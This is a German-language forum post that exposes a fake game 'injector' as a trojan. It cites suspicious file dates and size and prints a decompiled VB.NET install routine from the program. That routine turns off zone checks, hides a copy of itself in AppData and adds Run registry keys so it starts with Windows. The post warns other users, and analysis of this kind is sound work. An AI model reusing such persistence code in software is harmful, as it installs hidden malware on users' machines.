Haha musste Grade ÜÜÜbelst Lachen...
Schaut mal auf die Datume der dateien.
Wieso liegen 8 Tage Zwischen exe und dll?
und wieso 1 jahr zu Custom Key List.
Naja und Stolze 464Kb für einen Injector..... XDDDDDD
Naja also wer auf so einen Mist Reinfällt der kann nur Geisteskrank sein...
HAHAHAHAHA msvcr71.dll FÜR EINEN INJECTOR XDDDD
ACHTUNG GLEICH SAGT ER DIE MUSS IN CSS INJECTED WERDEN HAHAHA
Und vonwegen Upx packed.. das is nich packed und hier mal ein teil aus dem source der exe
Code:
Private Shared Sub LRZEBNJQAGPQ_CHIEJNKIWMHXFnstall()
Try
Environment.SetEnvironmentVariable("SEE_MASK_NOZONECHECKS", "1", EnvironmentVariableTarget.User)
Catch obj1 As Object
End Try
Dim str As String = BASNZ_JB.WPVWXTJPCVCOSLIZIENOWUPZNBLWFGDGZGFBWQPKOOQE.GetString("olhjtjvw")
Dim str2 As String = BASNZ_JB.WPVWXTJPCVCOSLIZIENOWUPZNBLWFGDGZGFBWQPKOOQE.GetString("uoz_slsk")
Dim str3 As String = (Environment.GetFolderPath(SpecialFolder.ApplicationData) & "\")
If Not BASNZ_JB.KJRWCVLEYDTFAYFIBIVTBINK.Contains((str3 & str)) Then
Try
Directory.CreateDirectory((str3 & str))
Catch obj2 As Object
End Try
Try
File.Copy(BASNZ_JB.KJRWCVLEYDTFAYFIBIVTBINK, (str3 & str & "\" & str2), True)
Catch obj3 As Object
End Try
Try
File.SetAttributes((str3 & str), (FileAttributes.NotContentIndexed Or (FileAttributes.System Or FileAttributes.Hidden)))
Catch obj4 As Object
End Try
Try
File.SetAttributes((str3 & str & "\" & str2), (FileAttributes.NotContentIndexed Or (FileAttributes.System Or FileAttributes.Hidden)))
Catch obj5 As Object
End Try
Dim str4 As String = BASNZ_JB.WPVWXTJPCVCOSLIZIENOWUPZNBLWFGDGZGFBWQPKOOQE.GetString("pzlemoky")
Dim str5 As String = BASNZ_JB.WPVWXTJPCVCOSLIZIENOWUPZNBLWFGDGZGFBWQPKOOQE.GetString("iivayntz")
If Not String.IsNullOrEmpty(str4) Then
Try
Registry.CurrentUser.CreateSubKey("Software\Microsoft\Windows\CurrentVersion\Run").SetValue(str4, (str3 & str & "\" & str2))
Catch obj6 As Object
End Try
End If
If Not String.IsNullOrEmpty(str5) Then
Try
Registry.LocalMachine.CreateSubKey("Software\Microsoft\Windows\CurrentVersion\Run").SetValue(str4, (str3 & str & "\" & str2))
Catch obj7 As Object
End Try
End If
End If
End Sub
Man beachte die Zeilen mit : Registry.CurrentUser.CreateSubKey("Software\Micros oft\Windows\CurrentVersion\Run").SetValue(str4, (str3 & str & "\" & str2))
Naja was die bedeutet muss ich euch wohl nicht erklären.. damit wird ein Programm in den Systemstartup geschrieben, d.h. das Programm startet mit dem pc. und dass wird bei Trojanern Verwendet.
Nun Wisst ihr was es ist